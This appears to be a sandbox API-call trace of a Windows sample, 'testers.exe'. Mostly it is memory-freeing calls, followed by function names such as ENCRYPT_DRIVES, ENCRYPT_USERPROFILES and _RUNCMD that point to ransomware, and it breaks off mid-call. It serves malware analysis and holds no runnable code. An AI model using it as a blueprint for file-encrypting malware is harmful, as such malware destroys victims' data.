(HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x8d3f18 [0150.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d3750 | out: hHeap=0x8a0000) returned 1 [0150.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d36a8 | out: hHeap=0x8a0000) returned 1 [0150.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d3738 | out: hHeap=0x8a0000) returned 1 [0150.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d3720 | out: hHeap=0x8a0000) returned 1 [0150.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d3660 | out: hHeap=0x8a0000) returned 1 [0150.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d3648 | out: hHeap=0x8a0000) returned 1 [0150.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d36c0 | out: hHeap=0x8a0000) returned 1 [0150.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d3618 | out: hHeap=0x8a0000) returned 1 [0150.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d3600 | out: hHeap=0x8a0000) returned 1 [0150.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d35b8 | out: hHeap=0x8a0000) returned 1 [0150.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d35a0 | out: hHeap=0x8a0000) returned 1 [0150.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d35e8 | out: hHeap=0x8a0000) returned 1 [0150.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d3588 | out: hHeap=0x8a0000) returned 1 [0150.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d3570 | out: hHeap=0x8a0000) returned 1 [0150.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d3510 | out: hHeap=0x8a0000) returned 1 [0150.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d3558 | out: hHeap=0x8a0000) returned 1 [0150.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d3528 | out: hHeap=0x8a0000) returned 1 [0150.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d34f8 | out: hHeap=0x8a0000) returned 1 [0150.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d34f8 | out: hHeap=0x8a0000) returned 1 [0150.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d3138 | out: hHeap=0x8a0000) returned 1 [0150.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d3108 | out: hHeap=0x8a0000) returned 1 [0150.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d3528 | out: hHeap=0x8a0000) returned 1 [0150.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d3138 | out: hHeap=0x8a0000) returned 1 [0150.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d3108 | out: hHeap=0x8a0000) returned 1 [0150.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8c6638 | out: hHeap=0x8a0000) returned 1 [0150.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d3108 | out: hHeap=0x8a0000) returned 1 [0150.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ca5b0 | out: hHeap=0x8a0000) returned 1 [0150.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d3570 | out: hHeap=0x8a0000) returned 1 [0150.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d3588 | out: hHeap=0x8a0000) returned 1 [0150.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d3600 | out: hHeap=0x8a0000) returned 1 [0150.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d3138 | out: hHeap=0x8a0000) returned 1 [0150.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d35b8 | out: hHeap=0x8a0000) returned 1 [0150.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d3618 | out: hHeap=0x8a0000) returned 1 [0150.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d3138 | out: hHeap=0x8a0000) returned 1 [0150.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d3600 | out: hHeap=0x8a0000) returned 1 [0150.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8c6638 | out: hHeap=0x8a0000) returned 1 [0150.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d3138 | out: hHeap=0x8a0000) returned 1 [0150.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ca5b0 | out: hHeap=0x8a0000) returned 1 [0150.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d3138 | out: hHeap=0x8a0000) returned 1 [0150.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d36a8 | out: hHeap=0x8a0000) returned 1 [0150.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d34f8 | out: hHeap=0x8a0000) returned 1 [0150.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d3528 | out: hHeap=0x8a0000) returned 1 [0150.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d3558 | out: hHeap=0x8a0000) returned 1 [0150.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d3510 | out: hHeap=0x8a0000) returned 1 [0150.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d35a0 | out: hHeap=0x8a0000) returned 1 [0150.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d3570 | out: hHeap=0x8a0000) returned 1 [0150.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d3588 | out: hHeap=0x8a0000) returned 1 [0150.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d35b8 | out: hHeap=0x8a0000) returned 1 [0150.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d3600 | out: hHeap=0x8a0000) returned 1 [0150.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d3618 | out: hHeap=0x8a0000) returned 1 [0150.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d36c0 | out: hHeap=0x8a0000) returned 1 [0150.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d3648 | out: hHeap=0x8a0000) returned 1 [0150.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d3660 | out: hHeap=0x8a0000) returned 1 [0150.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d3720 | out: hHeap=0x8a0000) returned 1 [0150.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d3738 | out: hHeap=0x8a0000) returned 1 [0150.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d4080 | out: hHeap=0x8a0000) returned 1 [0150.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d4068 | out: hHeap=0x8a0000) returned 1 [0150.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d36a8 | out: hHeap=0x8a0000) returned 1 [0150.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d4098 | out: hHeap=0x8a0000) returned 1 [0150.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d4098 | out: hHeap=0x8a0000) returned 1 [0150.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d3158 | out: hHeap=0x8a0000) returned 1 [0150.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d3138 | out: hHeap=0x8a0000) returned 1 [0150.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8c6638 | out: hHeap=0x8a0000) returned 1 [0150.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d3138 | out: hHeap=0x8a0000) returned 1 [0150.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ca5b0 | out: hHeap=0x8a0000) returned 1 [0150.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8caa20 | out: hHeap=0x8a0000) returned 1 [0150.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8caa08 | out: hHeap=0x8a0000) returned 1 [0150.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d3158 | out: hHeap=0x8a0000) returned 1 [0150.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ca960 | out: hHeap=0x8a0000) returned 1 [0150.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ca930 | out: hHeap=0x8a0000) returned 1 [0150.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d3158 | out: hHeap=0x8a0000) returned 1 [0150.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ca960 | out: hHeap=0x8a0000) returned 1 [0150.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ca930 | out: hHeap=0x8a0000) returned 1 [0150.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ca8d0 | out: hHeap=0x8a0000) returned 1 [0150.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d3178 | out: hHeap=0x8a0000) returned 1 [0150.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ca888 | out: hHeap=0x8a0000) returned 1 [0150.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d4098 | out: hHeap=0x8a0000) returned 1 [0150.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d4068 | out: hHeap=0x8a0000) returned 1 [0150.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d4080 | out: hHeap=0x8a0000) returned 1 [0150.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ca9d8 | out: hHeap=0x8a0000) returned 1 [0150.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8caa20 | out: hHeap=0x8a0000) returned 1 [0150.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8caa08 | out: hHeap=0x8a0000) returned 1 [0150.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ca990 | out: hHeap=0x8a0000) returned 1 [0150.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ca978 | out: hHeap=0x8a0000) returned 1 [0150.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ca9c0 | out: hHeap=0x8a0000) returned 1 [0150.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ca8e8 | out: hHeap=0x8a0000) returned 1 [0150.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ca900 | out: hHeap=0x8a0000) returned 1 [0150.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ca960 | out: hHeap=0x8a0000) returned 1 [0150.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ca870 | out: hHeap=0x8a0000) returned 1 [0150.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ca930 | out: hHeap=0x8a0000) returned 1 [0150.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ca8d0 | out: hHeap=0x8a0000) returned 1 [0150.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ca840 | out: hHeap=0x8a0000) returned 1 [0150.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ca810 | out: hHeap=0x8a0000) returned 1 [0150.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ca888 | out: hHeap=0x8a0000) returned 1 [0150.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ca888 | out: hHeap=0x8a0000) returned 1 [0150.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d3198 | out: hHeap=0x8a0000) returned 1 [0150.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d3178 | out: hHeap=0x8a0000) returned 1 [0150.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8c6638 | out: hHeap=0x8a0000) returned 1 [0150.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ca810 | out: hHeap=0x8a0000) returned 1 [0150.677] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ca930 | out: hHeap=0x8a0000) returned 1 [0150.677] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d3198 | out: hHeap=0x8a0000) returned 1 [0150.677] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ca810 | out: hHeap=0x8a0000) returned 1 [0150.677] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ca888 | out: hHeap=0x8a0000) returned 1 [0150.677] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ca8d0 | out: hHeap=0x8a0000) returned 1 [0150.677] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ca840 | out: hHeap=0x8a0000) returned 1 [0150.677] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ca810 | out: hHeap=0x8a0000) returned 1 [0150.677] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ca930 | out: hHeap=0x8a0000) returned 1 [0150.677] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8c6688 | out: hHeap=0x8a0000) returned 1 [0150.677] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ca930 | out: hHeap=0x8a0000) returned 1 [0150.677] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8c6688 | out: hHeap=0x8a0000) returned 1 [0150.677] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d31a8 | out: hHeap=0x8a0000) returned 1 [0150.677] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d3440 | out: hHeap=0x8a0000) returned 1 [0150.677] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8c6688 | out: hHeap=0x8a0000) returned 1 [0150.677] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ca978 | out: hHeap=0x8a0000) returned 1 [0150.677] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d31b8 | out: hHeap=0x8a0000) returned 1 [0150.677] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8caa20 | out: hHeap=0x8a0000) returned 1 [0150.677] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ca840 | out: hHeap=0x8a0000) returned 1 [0150.677] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ca810 | out: hHeap=0x8a0000) returned 1 [0150.677] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ca930 | out: hHeap=0x8a0000) returned 1 [0150.677] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ca8d0 | out: hHeap=0x8a0000) returned 1 [0150.677] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ca888 | out: hHeap=0x8a0000) returned 1 [0150.677] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8caa08 | out: hHeap=0x8a0000) returned 1 [0150.677] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ca990 | out: hHeap=0x8a0000) returned 1 [0150.677] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ca978 | out: hHeap=0x8a0000) returned 1 [0150.678] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d35b8 | out: hHeap=0x8a0000) returned 1 [0150.690] IUnknown:Release (This=0x8c64a8) returned 0x0 [0150.690] FreeLibrary (hLibModule=0x290000) returned 1 [0150.690] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\testers.exe", nBufferLength=0x7fff, lpBuffer=0x87fdb8, lpFilePart=0x89fdd8 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\testers.exe", lpFilePart=0x89fdd8*="testers.exe") returned 0x2f [0150.691] CharUpperBuffW (in: lpsz="_FO_FILESEARCH", cchLength=0xe | out: lpsz="_FO_FILESEARCH") returned 0xe [0150.691] CharUpperBuffW (in: lpsz="_FO_FOLDERSEARCH", cchLength=0x10 | out: lpsz="_FO_FOLDERSEARCH") returned 0x10 [0150.691] CharUpperBuffW (in: lpsz="_FO_FOLDERSEARCH", cchLength=0x10 | out: lpsz="_FO_FOLDERSEARCH") returned 0x10 [0150.691] CharUpperBuffW (in: lpsz="__FO_FOLDERSEARCHMASK", cchLength=0x15 | out: lpsz="__FO_FOLDERSEARCHMASK") returned 0x15 [0150.691] CharUpperBuffW (in: lpsz="__FO_FOLDERSEARCHMASK", cchLength=0x15 | out: lpsz="__FO_FOLDERSEARCHMASK") returned 0x15 [0150.691] CharUpperBuffW (in: lpsz="__FO_FOLDERSEARCH", cchLength=0x11 | out: lpsz="__FO_FOLDERSEARCH") returned 0x11 [0150.691] CharUpperBuffW (in: lpsz="__FO_FOLDERSEARCH", cchLength=0x11 | out: lpsz="__FO_FOLDERSEARCH") returned 0x11 [0150.691] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0150.691] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0150.691] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0150.691] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0150.691] CharUpperBuffW (in: lpsz="__FO_GETLISTMASK", cchLength=0x10 | out: lpsz="__FO_GETLISTMASK") returned 0x10 [0150.691] CharUpperBuffW (in: lpsz="__FO_GETLISTMASK", cchLength=0x10 | out: lpsz="__FO_GETLISTMASK") returned 0x10 [0150.691] CharUpperBuffW (in: lpsz="__FO_FILESEARCHTYPE", cchLength=0x13 | out: lpsz="__FO_FILESEARCHTYPE") returned 0x13 [0150.691] CharUpperBuffW (in: lpsz="__FO_FILESEARCHTYPE", cchLength=0x13 | out: lpsz="__FO_FILESEARCHTYPE") returned 0x13 [0150.691] CharUpperBuffW (in: lpsz="__FO_FILESEARCHMASK", cchLength=0x13 | out: lpsz="__FO_FILESEARCHMASK") returned 0x13 [0154.564] CharUpperBuffW (in: lpsz="__FO_FILESEARCHMASK", cchLength=0x13 | out: lpsz="__FO_FILESEARCHMASK") returned 0x13 [0154.564] CharUpperBuffW (in: lpsz="__FO_USERLOCALE", cchLength=0xf | out: lpsz="__FO_USERLOCALE") returned 0xf [0154.564] CharUpperBuffW (in: lpsz="__FO_USERLOCALE", cchLength=0xf | out: lpsz="__FO_USERLOCALE") returned 0xf [0154.564] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0154.565] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0154.565] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0154.565] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0154.565] CharUpperBuffW (in: lpsz="_SENDMESSAGE", cchLength=0xc | out: lpsz="_SENDMESSAGE") returned 0xc [0154.565] CharUpperBuffW (in: lpsz="_SENDMESSAGE", cchLength=0xc | out: lpsz="_SENDMESSAGE") returned 0xc [0154.565] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0154.565] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0154.565] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0154.565] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0154.565] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0154.565] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0154.565] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0154.565] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0154.566] CharUpperBuffW (in: lpsz="_CRYPT_DECRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_DECRYPTFILE") returned 0x12 [0154.566] CharUpperBuffW (in: lpsz="_CRYPT_DECRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_DECRYPTFILE") returned 0x12 [0154.566] CharUpperBuffW (in: lpsz="_CRYPT_DECRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_DECRYPTDATA") returned 0x12 [0154.566] CharUpperBuffW (in: lpsz="_CRYPT_DECRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_DECRYPTDATA") returned 0x12 [0154.566] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0154.566] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0154.566] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0154.566] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0154.566] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0154.566] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0154.566] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0154.566] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0154.566] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0154.567] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0154.567] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0154.567] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0154.567] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0154.567] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0154.567] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0154.567] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0154.567] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0154.567] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0154.567] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0154.567] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0154.567] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0154.567] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0154.567] CharUpperBuffW (in: lpsz="START_THE_SHOW", cchLength=0xe | out: lpsz="START_THE_SHOW") returned 0xe [0154.567] CharUpperBuffW (in: lpsz="START_THE_SHOW", cchLength=0xe | out: lpsz="START_THE_SHOW") returned 0xe [0154.567] CharUpperBuffW (in: lpsz="ENCRYPT_DRIVES", cchLength=0xe | out: lpsz="ENCRYPT_DRIVES") returned 0xe [0154.567] CharUpperBuffW (in: lpsz="ENCRYPT_DRIVES", cchLength=0xe | out: lpsz="ENCRYPT_DRIVES") returned 0xe [0154.567] CharUpperBuffW (in: lpsz="DECRYPT_DRIVES", cchLength=0xe | out: lpsz="DECRYPT_DRIVES") returned 0xe [0154.568] CharUpperBuffW (in: lpsz="DECRYPT_DRIVES", cchLength=0xe | out: lpsz="DECRYPT_DRIVES") returned 0xe [0154.568] CharUpperBuffW (in: lpsz="ENCRYPT_USERPROFILES", cchLength=0x14 | out: lpsz="ENCRYPT_USERPROFILES") returned 0x14 [0154.568] CharUpperBuffW (in: lpsz="ENCRYPT_USERPROFILES", cchLength=0x14 | out: lpsz="ENCRYPT_USERPROFILES") returned 0x14 [0154.568] CharUpperBuffW (in: lpsz="DECRYPT_USERPROFILES", cchLength=0x14 | out: lpsz="DECRYPT_USERPROFILES") returned 0x14 [0154.568] CharUpperBuffW (in: lpsz="DECRYPT_USERPROFILES", cchLength=0x14 | out: lpsz="DECRYPT_USERPROFILES") returned 0x14 [0154.569] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0154.569] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0154.569] CharUpperBuffW (in: lpsz="_DECRYPT", cchLength=0x8 | out: lpsz="_DECRYPT") returned 0x8 [0154.569] CharUpperBuffW (in: lpsz="_DECRYPT", cchLength=0x8 | out: lpsz="_DECRYPT") returned 0x8 [0154.569] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0154.569] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0154.569] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0154.569] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0154.569] CharUpperBuffW (in: lpsz="_RUNCMD", cchLength=0x7 | out: lpsz="_RUNCMD") returned 0x7 [0154.569] CharUpperBuffW (in: lpsz="_RUNCMD", cchLength=0x7 | out: lpsz="_RUNCMD") returned 0x7 [0154.569] CharUpperBuffW (in: lpsz="TRUE_HOMEDRIVE", cchLength=0xe | out: lpsz="TRUE_HOMEDRIVE") returned 0xe [0154.569] CharUpperBuffW (in: lpsz="TRUE_HOMEDRIVE", cchLength=0xe | out: lpsz="TRUE_HOMEDRIVE") returned 0xe [0154.570] CharUpperBuffW (in: 